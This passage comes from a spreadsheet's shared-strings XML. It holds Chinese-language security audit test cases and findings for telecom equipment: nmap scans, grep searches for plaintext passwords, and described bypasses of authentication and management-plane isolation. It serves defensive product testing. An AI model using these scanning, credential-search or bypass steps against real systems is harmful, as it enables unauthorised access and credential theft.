    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.执行命令：netstat -l,查看系统守护进程syslogd是否会监听网络端口514/udp上其他系统的登录消息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.除非该服务器被作为日志服务器，否则不应该在端口514/udp上监听入方向的日志消息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.被测目标系统正常运行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.用winSCP登陆系统
2.在/root及/etc目录下分别找到/root/.rhosts，/root/.shosts和/etc/hosts.equiv这三个文件
3.在文件上点击右键，查看“属性”</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>091 POST方式跨站脚本测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.存在无法处理异常数据的程序</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、多组件或网元系统运行正常</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.不需要与公网交互的地址为私有地址。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：FM 部件上存在配置文件保存未知的用户名信息。
问题2（致命）：OC部件 OC系统数据库OCPM用户在手册中未说明，疑被客户认为是未公开接口。
问题3（致命）：1)在一台安装了WEB LMT的机器A上以admin成功登陆系统；2)在另一台安装了WEB LMT的机器B上以admin登陆过程中，输错密码3次，admin账户被锁定；3)进入A的应急诊断，输入命令sec_HandleUlkUserTimeout 0；4)在B上继续以正确的密码登陆，admin此时以被解锁的状态可成功进入系统；另外，查询安全维护指导书，没有对admin解锁的应急诊断命令进行说明。
问题4（致命）：1）telnet维护管理，通过user&amp;pass认证登录设备，设备提供的认证方案，local、radius、hwtacacs三种，设备不支持none（无认证）这种模式，Authentication-mode none命令，命令行中无法配置执行，通过修改配置文件，修改为authentication-mode none，重启设备此时登录设备，只需输入用户名，输入错误密码、不输入用户密码都可登录上去，认证方案中，none模式生效；2）用户认证方案首选radius或者hwtacasc，如：authentication-mode radius none在radius、hwtacacs不可用的情况下，登录设备，输入错误密码、不输入用户密码都可登录上去；(一) 无需认证登录即可管理设备，本身这种登录方式极为不安全，不应该保留；(二) None认证方式，命令行中无提示、资料中无说明；但可以通过配置文件生效附：产品资料明确说明了“屏蔽了无认证（none）类型的用户认证模式”，可配置认证方案中没有提及，执行命令authentication-mode {hwtacacs | radius | local}*,配置认证模式。缺省情况下，认证模式为local，即本地认证。受限公开文档中仅提及：命令格式：authentication-mode {hwtacacs | radius | local}*{none}，none表示不进行认证，直接让用户通过，而在使用指南标明该命令是升级兼容命令，仅在配置恢复阶段可以执行，用户不需手动配置。
问题5（致命）：新建的管理员账号可以通过应急诊断命令和复位基站使超级账户admin恢复默认密码，从而间接修改了admin密码，而产品资料里有明确提出来admin是超级账户，admin的密码只能由自己修改，现在通过WebLMT可以实现外部管理员修改admin的密码，这跟资料要求是不符合的。威胁点：1）非admin管理员可以修改超级账号admin用户的密码实现了越权。2）非admin管理员恢复admin的密码后可以使用admin用户查看所有用户的账户，实现了越权。
问题6（致命）：1）设备可以配置成双网卡模口，0号口是管理网口（172.0.106.12/16），1号口(172.1.106.12/16)是业务网口。2）产品强制设备不能配置在同一个网段；3）测试使用一台PC（172.1.106.13/16、网关：172.1.106.12），PC能ping通业务口，ping不通管理口。4）Tcp扫描的时候管理面的端口都是filtered的状态，可以探测到但是端口是被过滤的。但是在PC机上用nmap扫描UDP协议的时候，发现161（snmp）端口是open的，通信矩阵里面snmp是管理网口，说明业务和管理没有做好隔离。5）证明从业务面可以登录管理接口161。
问题7（致命）：1）升级指导书简单的无法按照说明书完成升级，并且不支持的CFE升级方式仍然保留在升级指导书中。2）产品仅提供一份《用户指南》作为公开资料，用户指南中连最基本的WEBUI的管理维护都未全部列出，比如说可以通过WAN口管理设备，在任何资料中均为提及；3）产品提供的受限资料《LTE CPE eA660未公开接口描叙》中的管理账号及命令，组播升级方式等都是应该公开的资料。并且名字也取的不对，不应该取名为未公开。该版本已经没有串口，但资料中还有串口使用的资料。
问题8（致命）：在CPI资料“eLTE2.2 eA660系列CPE用户指南(01)(PDF)-CN.pdf”、eA660 Web页面等处，未发现相关对用户应提供的隐私策略声明。
问题9（致命）：SE2900产品存在许多软调参数取值未包含在受限公开的软调操作说明文档中，经统计，共计涉及18个模块269个控制参数取值未在软调资料中公开，其中DIAM、VPU、SEM三个模块（共计130个控制参数取值）完全没有在软调说明书中公开。建议：未文档化的命令/参数、端口等接入方式（包括但不限于产品的生产、调测、维护用途），需通过产品资料等向运营商或监管机构公开或受限公开。
问题10（致命）：进入bios以后，修改bootline password密码的时候需要输入旧密码，可是产品资料里面没有任何说明。建议：在客户说明书文档里对此命令做说明，并将初始密码写进文档中。 
The note in the customer documentation [12] describing the unusual behaviour of the ma-defend protocol command is inadequate.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：通过在与业务口连接的电脑上配置静态路由，电脑可以从接口板网口（三层接口即配置IP）ping/telnet/ftp/snmp通主控板网口，业务面和管理面路由没有做到三面隔离； 如果直接插到业务口，业务口不配置任何地址，此时，不管你是配置路由，还是修改PC的网卡地址，都ping不通管理网口地址； 另外：通过业务口能直接telnet（业务口IP）登录到设备，也就是带内组网，不应该对接口板的所有的网口都能直接用来做管理登录用，应该是对特定可以信赖和用于带内组网的端口进行指定，默认所有端口是不能用于登录设备的。建议：路由做到三面隔离；应该是对特定可以信赖和用于带内组网的端口进行指定，默认所有端口是不能用于登录设备的，并且对管理员Ip进行限制，默认不允许任何用户登录。
问题2（致命）：加载平面（192.168.0.1）主要是直连预安装使用，维护终端要求与主OMS的0号GE接口连接才能访问。验证过程中发现通过业务平面\管理平面，在一定条件下也能访问加载平面。以业务面为例，过程如下：1）在业务面上添加路由：route add 192.168.0.1 129.4.164.2；2）Ping 192.168.0.1，无法连通； 3）查看主机防火墙，发现是对192.168.0.1的icmp报文进行了过滤，但开启了22、28443端口。4）使用telnet 192.168.0.1 22连接，可以连接。使用putty访问22端口，可以登录os。5）出现业务面可以访问192.168.0.1 22端口的原因确认是/opt/uds/installconfig/script/om/ethMonitor.sh 进程未启动，防火墙始终开启了22 28443两个端口。启动该脚本后，在install无直连设备时，22 、28443两端口会在防火墙中关闭。 /opt/uds/installconfig/script/om/ethMonitor.sh的主要作用为当install网口有连接时，防火墙打开22、28443两个端口，当install网口无连接时，防火墙关闭22、28443两个端口。系统中5月28号启动该脚本进行后，22、28443端口关闭。业务面无法访问加载平面22、28443端口。6）上述业务平面与加载平面通过设置iptables进行端口隔离进行过滤不太合理。当出现以下几个场景里，业务面与加载面隔离会失效。1）加载平面有直连设备时，业务面可访问加载平面。2）/opt/uds/installconfig/script/om/ethMonitor.sh 进程无守护进程，当系统异常或人为关闭未启动进程时，防火墙隔离22、28443两端口会失效。3）如果内部加载平面（192.168.0.1）IP被修改里，隔离失效。建议：切断业务ip、管理ip对加载平面192.1687.0.1的路由转发。
问题3（致命）：1）设备可以配置成双网卡模口，0号口是管理网口（172.0.106.12/16），1号口(172.1.106.12/16)是业务网口。2）产品强制设备不能配置在同一个网段。3）测试使用一台PC（172.1.106.13/16、网关：172.1.106.12），PC能ping通业务口，ping不通管理口。4）Tcp扫描的时候管理面的端口都是filtered的状态，可以探测到但是端口是被过滤的。但是在PC机上用nmap扫描UDP协议的时候，发现161（snmp）端口是open的，通信矩阵里面snmp是管理网口，说明业务和管理没有做好隔离。5）证明从业务面可以登录管理接口161 。
问题4（严重）：虽然有management-port isolate enable命令用来使能管理口隔离功能，但没有默认开启。默认情况下，管理口的报文可能从业务口转发出去，业务口的报文可能从管理口转发出去。
问题5（严重）：可以从业务接口LPU单板（三层接口即配置IP）发送非管理面报文到主控板，业务面路由和管理面路由没有隔离。
问题6（严重）：可以从业务接口LPU单板（三层接口即配置IP）发送非管理面报文到主控板，业务面路由和管理面路由没有隔离&amp;业务用户可以从业务接口（三层接口即配置IP）ping通管理网口&amp;用户默认可以PING通上行接口，存在泄露运营商网络拓扑的威胁。
问题7（严重）：通过在与业务口连接的电脑上配置静态路由，电脑可以从接口板网口（三层接口即配置IP）ping/telnet/ftp/snmp通主控板网口，业务面和管理面路由默认没有做到三面隔离；路由默认做到三面隔离；management-port isolate enable（默认使能可以做到ping不通管理网络）management-plane isolate enable（默认使能可以做到ping不通管理口IP）。
问题8（严重）：在任何一个业务口上配置IP，通过此IP进行TELNET，FTP，SSH，SNMP登录成功，并可以对系统作配置、维护、监控，与从管理口登录没有任何区别，也就是说业务接口具备了管理接口全部功能。
问题9（严重）：从管理口和业务口之间的IP报文可以相互转发，即从管理口收上来的报文会从业务口转发出去，同样，从业务口收上来的报文也会从管理口转发出去。
问题10（严重）：VS0与VS1业务口相连（或路由可达），VS0既使使能了三面隔离，从VS1也可以ping通VS0的管理口，VS之间没有做到三面隔离。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>008 禁止在URL、错误信息或日志中暴露会话标识符</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>001 所有能对系统进行管理的人机接口以及跨信任网络的机机接口必须有安全的接入认证机制并缺省启用，标准协议没有认证机制的除外。设备外部可见的能对系统进行管理的物理接口必须有接入认证机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.目标系统运行正常</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：在passwd 和group文件里发现大量的不明帐号0，nobody, support并且这些帐号在任何客户资料中均未提及，会被认为““未公开接口”。参看DTS2014081803512
问题2（一般）：UUSYNC模块再同步数据的时候会循环内部创建临时ROOT账户，且密码和帐号都是硬编码再模块中，虽然存在的时间很短，但是由于好似循环创建还是有机会被用户使用到。参看DTS2014073007497
问题3（一般）：资料并未提及该帐号的描述，存在的帐号易被客户质疑为未公开接口。参看DTS2014040204342
问题4（一般）：SC产生一个无法销毁无法更改无法覆盖的用户，参看DTS2014070702576
问题5（提示）：设置已经具备创建、删除SNMP V3账户的命令行，但缺少查询已有帐号的命令行:usm-user Possible Command is snmp-add-usm-user snmp-del-usm-user。
问题6（提示）：对SysPortal等，使用admin删除在线用户，不能立即生效，权限控制不及时生效。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.网络正常
2.目标系统运行正常</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>011 校验删除的文件的相对路径</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.删除接口不可以随意删除其它不相关文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1. 通过nmap，命令识别出被检目标开放的端口：   nmap -F -sV localhost
 2.通过nmap命令查询对应端口使用的算法列表：
nmap -sS -A -v --reason -p端口 -n -Pn --max-scan-delay 10 -oA Tcp -script ssl* -oX d:/ssl.xml localhost
3.查看ssl.xml中支持的SSL版本：
不安全版本：sslv1、sslv2/sslv3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>高</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Level 1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查产品配套资料中，是否有清晰的帐号口令清单（如超级管理员帐号、应用系统各种角色下的帐号、测试/演示/示例帐号等）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.遍历数据库中涉及密码/口令（用于网络通信协议协商的身份认证Key等）的表字段检查是否明文存储：
a.对于新开发产品(前提:资料规范)检查数据库接口说明书，搜索口令相关字段
b.oracle数据库使用“SELECT * FROM USER_TAB_COLUMNS where column_name LIKE '%PASS%' ORDER BY TABLE_NAME”，搜索相关字段（红色字体可替换）
c.其他数据库可以飞检或者导出数据库到一个文件中；内存数据库通常有接口文档，搜索相关字段
2.遍历服务器各用户下涉及密码/口令的文件检查是否明文存储:
a.find . -name "*" | xargs grep -i "passw" （红色字体可替换）
3.遍历版本发布路径中其他安装在Window或者其他终端上的程序：
a.安装完成或者解压完毕后使用Search and Replace.zip搜索相关字段
4.遍历日志文件或日志表，搜索密码/口令相关字段
a.打开debug日志执行自动化/手工用例保存日志
b.搜索代码类似log_debug、log_echo等打印语句是否涉及密码
5.遍历其他可显示口令的位置比如页面、客户端等检查是否明文存储
6.遍历其他提供给用服或者定制的软件/工具，只要接入客户网络，应该满足红线要求
7.访谈开发人员常用口令/密码命名
常用搜索关键字之常用口令/密码命名:pass|password|pwd|passwd|pswd|mima|key|sharekey|checkpwd|crypto|cardno|PINNUMBER等
注：
A.有时密码/口令隐藏在URL或者链接串中比如
a.jdbc.properties=http://ip:port//user:pass@SID
b.ftp链接信息=ftp://ip:port//user:pass
B.分析抽象密码明文存储场景比如：
a.web登录时，直接传输口令的MD5摘要，数据库中存储的也是MD5摘要，属于抽象的明文存储
C.如果充值卡是不带密码的（有一些产品），那这个卡号应当等同于密码，跟密码处理是一样的。如果充值卡是带密码的，密码做加密处理，充值卡号（需要密码）在本地存储文件中可以是明文的，但是传输通道安全和存储文件其他用户不可读。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查Web Service接口传递敏感消息是否使用HTTPS传输，查看WSDL地址即可。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆Web后台服务器
2.询问开发人员或用find命令找到对应的配置文件，
例如  find ./ -name "*conn*"
      find ./ -name "*jdbc*"
3.查看配置文件中连接数据库的帐号密码在配置文件中是否按照红线标准加密</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>socket序列必须受到保护，以防止受到SYN flooding攻击
1.登陆被测系统，进入命令行模式
2.cat /proc/sys/net/ipv4/tcp_syncookie输出1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.被测系统支持SSH接入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.手工检查产品的安全资料是否存在操作系统加固的操作描述，操作系统补丁升级、安全配置等操作的说明；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访谈确认：
1、确认客户端中不存在特殊的账户（隐藏账户），使得能够使用该账户登录客户端完成操作
2、检查资料是否对所有账号有详细说明
手工测试：
3、检查数据库中的用户表和/etc/passwd表中，</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统进行了权限和信息来源的控制，不会记录伪造的日志信息
2、非法或合法用户发送消息记录日志均记录审计日志</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.rsyslog日志文件存在</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>rsyslog日志文件不存在</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、确定系统的引导加载程序是LILO或GRUB
若是LILO，查看文件/etc/lilo.conf的权限是否为600；若是GRUB，查看文件/boot/grub/menu.lst的权限是否为600</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.使用如下命令：
cd /etc/init.d
ls
查看启动目录/etc/init.d中有哪些服务；
3.检查其中是否有不需要开机启动的服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.没有开机不需要启动的服务（需要根据产品需要，进行排查）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通信矩阵中端口对应的进程都不是root用户启动的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.执行如下命令：
lsof -n -P -I XXX(端口），查看打开端口的进程是否是root用户启动
（端口遍历通信矩阵中列出的所有端口）
注：直接与外界有数据交流的进程必须权限最小化
（linux下看那些端口打开了socket句柄（包括二层和三层的socket），如果打开了二层句柄，看看绑定的接口是不是对外接口；如果打开了三层句柄，看看绑定的IP是否是0.0.0.0，如果满足条件了，再看进程权限是否是root。）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器
2.查看运行Web服务器的操作系统帐号，是否为“root”、“administrator”等特权帐号或高级别权限帐号
备注：
   windows：打开任务管理器，选择“进程”页，勾选左下方的“显示所有用户的进程”，检查运行Web服务器的帐号；
? linux：使用“ps –ef|grep java”命令，返回结果第一列的操作系统用户就是运行Web服务器的帐号；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统从设计（典型组网或者安装规划）上无法从用户面直接访问管理接口：
对于仅支持对外管理的系统，必须保证管理面与用户面隔离，并在产品资料中描述相关隔离机制，以确保在用户面使用nmap等工具进行端口扫描都无法扫描到管理平面的地址及端口；
对于支持带内管理模式且有独立管理面IP的产品，需通过ACL或VLAN等机制来保证带内管理面的隔离,并在产品资料中需描述相关隔离机制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用xdefend进行SSL/TLS扫描，需要填入的数据包括：目标Ip、目标端口、版本和用例范围
2、观察被测设备CPU、系统、连接状态</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（提示）：在安装Linux系统（按CPI资料描述系统安装即会自动完成系统加固）后，安装eCNS610产品软件前，发现root账户未禁止root远程登录。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看SSH 版本
2、如果系统同时支持SSH V1.x和V2版本，是否开启SSH V1.x
3、SSH的root帐号远程登录
4、自研的或修改自开源第三方的SSH V2协议或应用在登录时，是否显示服务端公钥的数字指纹
5、自研的或修改来自开源第三方的SSH V2协议，是否支持基于公钥的认证方式
6、因兼容性需打开SSH V1.x或telnet时，是否提示风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统中开放的端口须如实记录在通信矩阵中
2、通信矩阵中须删除不再使用的端口记录
3、通信矩阵中记录的端口用途与实际开启的网络服务功能须保持一致</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、资料针对admin和其他管理员的权限描述须正确、合理
2、安全资料（如白皮书、配置手册）须对三面隔离的配置进行说明
3、系统中禁止存在安全资料中未说明的用户名
4、禁止存在产品资料中未说明的命令/参数、端口等接入方式（包括但不限于产品的生产、调测、维护用途）
5、安全资料中admin解锁的应急诊断命令说明须与实际保持一致
6、应在安全资料中提示无认证方式的风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不存在指定备份文件或者临时文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 高
注：
a.典型的敏感数据包括：口令、银行帐号、大批量个人数据、用户通信内容、密钥、用于认证的证书、License、用于网络通信协议协商的身份认证Key等
b.信任网络：通常是指对该网络内的所有设备和用户的行为是可信的网络，如同一信任域内的设备；
c.典型非信任网络：通常指该网络内的设备和用户行为不可控或存在较大安全风险的网络，如Internet、intranet、与第三方SP/CP的接口；注意：运营商内外网并不是界定信任网络和非信任网络的凭据，比如防火墙不同区域之间的通信是非信的。
d.windows嗅探工具使用Wireshark，Suse/AIX/HP-UX使用tcpdump， solaris使用snoop</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：通过sp_configure查询Sybase数据库配置，发现登录日志未配置（log audit logon failure和log audit logon success的 config value和run value均为0）。
问题2（致命）：NTP SERVER Broadcast.rar系统配置NTP SERVER服务开启后，使用CODENOMICON扫描发现存在高风险漏洞：其中问题工具评定分数大部分都为9.3。
问题3（致命）：使用NESSUS扫描系统发现6个高级别的漏洞，如:74326（5）-OpenSSL 'ChangeCipherSpec'MiTM Vulnerability.
问题4（一般）：Web界面的Telnet开启按钮无法点击使能Telnet；(2)通过修改配置文件rse.omc.telnet.enable = true可以打开telnet功能；测试结果：telnet功能打开以后，在Web界面看到的仍然是无法开启Telnet功能，说明Web的Telnet功能的开启关闭功能没有实现。
问题5(提示）：在安装Linux系统（按CPI资料描述系统安装即会自动完成系统加固）后，安装eCNS610产品软件前，发现root账户未禁止root远程登录。根据CPI资料，系统支持禁止root远程登录的安全加固可选操作。系统没有做到缺省默认安全，违反最小权限原则。建议：系统应做到缺省默认安全和遵循最小权限原则。安装系统及核心组件使用root后，安全加固须禁用root远程登录。安装应用系统仅分配所需的最小权限即可，须root权限可用su进行切换，做到最小化权限。
问题6（提示）：Sybase数据库审计功能，包括下面的功能：登陆/登出日志、批量复制文件日志、创建和删除表/表空间/存储过程/触发器/视图日志、数据库/事务导出日志等。使用命令行登录数据库，执行sp_configure查询Sybase数据库配置，发现审计开关未打开（auditing的config value和run value均为0）。
问题7（提示）：通过下面方法查询数据库的远程服务配置：no net password encryption表示远程服务通信未加密；安全模式可能如下：  "rpc security model A" 是不提供安全机制 "rpc security model B" 是提供不同的安全服务，如互相认证、消息加密、完整性校验等。
问题8（提示）：Controller系统，SQL SERVER 2008安装加固后，没有对sa超级用户改名或者禁用。
问题9（提示）：AIX操作系统加固存在很多不安全项：1）操作系统root用户可以直接远程登录；2）密码有效期为无限期；3）存在空密码；4）远程登录系统后，无超时退出机制；5）用户清单描述与实际不符，查看产品文档中的用户清单，有很多禁止登录的用户仍然可以登录，利用ipsec用户仍然可以成功登录。
问题10（提示）：数据库与Provision安装完成后，数据库文件权限为640，数据库加固后导致数据库文件权限为660。 
问题11（提示）：SecureCAT SUSE Linux Enterprise Server 11 Benchmark，用Level 1- Normal Security profile进行配置评估，得分64分。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、敏感个人数据禁止明文存储在系统日志文件、代码、Cookie中（存储类软硬件产品除外，如硬盘，数据库等）
2、操作人员访问个人数据之前须对其身份及权限进行验证
3、产品对于个人数据的访问控制策略须满足不同职位职能的权限要求，并可以取消操作人员的访问权限
4、数据主体的银行卡号在存储前须采用安全加密机制进行加密，禁止存储CVV2
5、（可选）具有个人数据导出功能的产品，导出时应提醒操作人员导出的数据中包含个人数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查产品对外发布资料中是否配套提供产品通信矩阵；
2、检查通信矩阵的内容，是否有描述机器/网元/模块间的通信关系，包括：通信使用的端口、协议、IP地址、认证方式、端口用途信息等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查产品的软件（包含软件包/补丁包）是否提供为完整性校验所需的软件摘要文件；
2、下载软件（包含软件包/补丁包），使用合法算法生成一个校验值；
3、检查生成的校验值是否和产品提供的一致；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>采用Coverity Prevent/Fortify做静态代码检查。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.不管新开发产品还是定制补丁版本都没有使用有专利/私有加密算法。
2.禁止使用当前已知的不安全的密码算法，标准协议定义且没有替代算法的或需要与第三方系统对接的除外，不建议使用存在安全风险的密码算法。
如需要与第三方系统对接或兼容老系统，产品支持使用不安全密码算法的情况，应在产品CPI资料中提示风险。---此条不作为2012年产品网络安全红线落地安全稽核的处罚依据，但会作为产品的安全风险项提出。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、安全日志级别相对较高，不会因级别低导致管理员容易忽略。
4、各级别的日志不可以有敏感信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访问敏感数据要有认证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查结果为：pass
2、执行结果为：不低于以下参数配置 
password required pam_cracklib.so retry=3 minlen=14 dcredit=-1 ucredit=-1 ocredit=-1 lcredit=-1
（retry=3 - 在发回失败之前，允许3次尝试。
minlen=14 -密码不能少于14个字符。
dcredit=-1至少1位数字。
ucredit=-1至少1个大写字母。
ocredit=-1至少1个特殊字符。
lcredit=-1至少1个小写字符。）
注：若以上执行结果为fail，可核对密码强度。密码强度最低要求为红线的口令安全要求。若符合红线要求可不提问题；若不符合红线要求，则为红线问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：使用默认配置进行TLS连接时，发现在协议栈中默认使用不安全加密方式(RSA_RC4_MD5)，导致HTTPS连接易被破解。此问题源于Android对TLS/SSL的实现，当进行TLS/SSL连接时，在Client Hello包中cipher suites里默认将不安全的加密方式放到了最优先使用。
问题2（致命）：FC端口矩阵中，7443（https）端口和7070（http）端口，但是扫描发现默认打开（并且对所有面都处于监听状态），资料中没有支持关闭的方法。
问题3（致命）：通过sp_configure查询Sybase数据库配置，发现连续登录失败锁定帐号未配置（maximum failed logins的config value和run value均为0）。建议：在加固中修改成5次，或在资料中建议客户修改成5次。
问题4（致命）：SC 对外对接5个HTTP协议接口默认都是开启的，不支持关闭，不支持安全协议，认证接口口令没有文档化。
问题5（致命）:无法单独关闭IPMI RMCP不安全通道。其本意是要给用户提供安全的协议，如果同时提供了不安全协议，要能关闭不安全协议，但不能关闭功能的方式来解决。如要提供SNMPv3，支持关闭v1，v2，提供SSH，关闭Telnet。
问题6（致命）:帐户管理REST接口用于创建、删除、修改存储帐户，属于管理平面。支持http与https，系统上http协议不支持关闭。建议:增加http协议关闭功能。
问题7（致命）：SNMPV1/V2协议不支持关闭,存在安全风险,违返安全红线。 
问题8（致命）：1）配置一个本地用户，如下所示：配置如上用户jojo01的密码是使用可逆加密算法AES128进行加密的。但是系统针对该用户的所有场景不需要还原口令。该用户在系统中可以作为赋予FTP、SSH，telnet、terminet(终端用户）服务，这些服务都不需要还原口令的场景。2）目前产品的预防措施：配置一个用户后可以不赋予服务，这个时候可以配成AES128可逆加密算法，但是如果赋予FTP、SSH、telnet服务系统会自动将可逆加密算法转变成不可逆加密算法。3）安全威胁所在：在配置用户后不赋予该用户任何服务时，用户口令如果配置成可逆，可以被系统还原成明文密码。华为公司存在被质疑的嫌疑。引发信任危机。因为系统任何场景确实不需要用户密码可逆，虽然在使用相关服务后密码转换成不可逆算法，但这个时候早在建立用户（如果配置成可逆加密算法）的时候已经可以拿到明文密码了。4）根因分析：UGW产品使用的是数通的VRP平台，数通产品部分用户服务（比如说PPP）需要该功能，所以目前用了使用可逆加密算法的配置，但是UGW9811不需要这种使用场景。
问题9（致命）：ISM客户端SMI-S通过HTTP协议和设备通信的端口5988默认关闭的方式不是服务实际关闭，只是通过防火墙过滤关闭。
问题10（致命）:uTraffic采集器支持使用SNMP协议向U2000上报trap告警和接收告警清除同步请求，这个时候uTraffic作为代理端默认使用15998端口，该端口同时支持且默认打开SNMP的V1、V2、V3版本协议，但不支持单独关闭其中的不安全协议版本V1和V2。
问题11（致命）:系统作为FTP服务端同时支持FTP和SFTP协议，其中FTP功能实现采用了第三方组件vsftp，在按照产品加固指南对系统进行加固后，FTP服务仍默认开启，且没有提供关闭该FTP服务的方法。 
问题12（致命）：Ntp分为以下几种模式：客户端/服务器模式、对等体模式（双方互为客户端、服务端）、广播模式、组播模式。NTP服务是使用UDP 123端口，M2000作为ntp客户端时，不应该开启服务端端口123。Sun机型将M2000设置为ntp客户端，再用Nmap扫描，扫描出服务端端口123端口。 
问题13（致命）：通过管理维护网口Telnet连接6000端口，能成功进入并登陆成功，Telnet协议不支持关闭。
问题14（严重）：在WebLMT上新建帐户时默认是Active状态，即没有默认开启登录防暴力破解机制，需要手工配置，存在安全隐患。
问题15（严重）：系统在初始安装后，串口进入是不需要认证的，并且是以最高级的管理员身份进入可以对系统进行所有操作。系统有提供命令修改登录认证机制为AAA模式和NONE模式，AAA模式就是以本地用户进入，会有相关认证和权限控制机制，NONE模式就是没有认证模式。系统默认是NONE模式，而且系统使用时也没有机制要求或提醒用户修改为安全的模式，只在资料上进行了补充说明，这样的默认机制对于系统来说是非常不安全的。
问题16（严重）：telnet、http两个明文不安全协议默认开启。并且关于http的安全资料中描述与页面中不符。
问题17（严重）：网管访问网元默认采用“普通+安全SSL”方式，即同时支持明文传输和SSL安全传输。采用默认方式访问网元时，用户名和密码明文传输，在非信任区域存在泄漏的风险。产品在设计该模式时，主要为了兼容老版本网管，属于需使用不安全接入协议的场景，但并未提示使用该不安全接入协议的风险。
问题19(严重）：Nmap扫描发现3000端口一直处于监听状态，可是使用场景是diag口调试使用，海思工具HiDS不对客户开放，且AT命令这些也是华为内部使用的。3000端口只是内部工具调试时会使用的端口，不应该一直开放并监听。
问题13（严重）：Radius认证协议规定，Session-Timeout为用户在线最大时长。当Radius服务器响应Accept-Access报文中Session-Timeout字段设为不为0的任意数字x时，经过x秒后用户会自动下线；当此字段值为0时，用户不会下线。
问题14（严重）：eSight 31921端口，在cmd窗口执行telnet 10.144.30.137 31921操作（未等宽），tcp连接长时间（将近5小时）不释放，会导致tcp连接耗尽，导致拒接FTP服务。
问题15（一般）;连接数据库，查看数据库密码过期相关参数，发现口令的有效时间（天数）的参数PASSWORD_LIFE_TIME为UNLIMITED，即密码不过期。
问题16（提示）：客户端中，“ADD SNMPUSER”命令选择SNMPV3选项时，鉴权选项默认为非鉴权方式；再选择鉴权方式后，加密选项默认为非加密方式。这样的原则不符合安全使用的原则。
问题17（提示）：查看北向维护工具、PMS、GCLI三个页面登录界面源代码可以看到，password输入框autocomplete属性没有设置成off，可以设置成浏览器记住密码，存在敏感信息泄露风险。
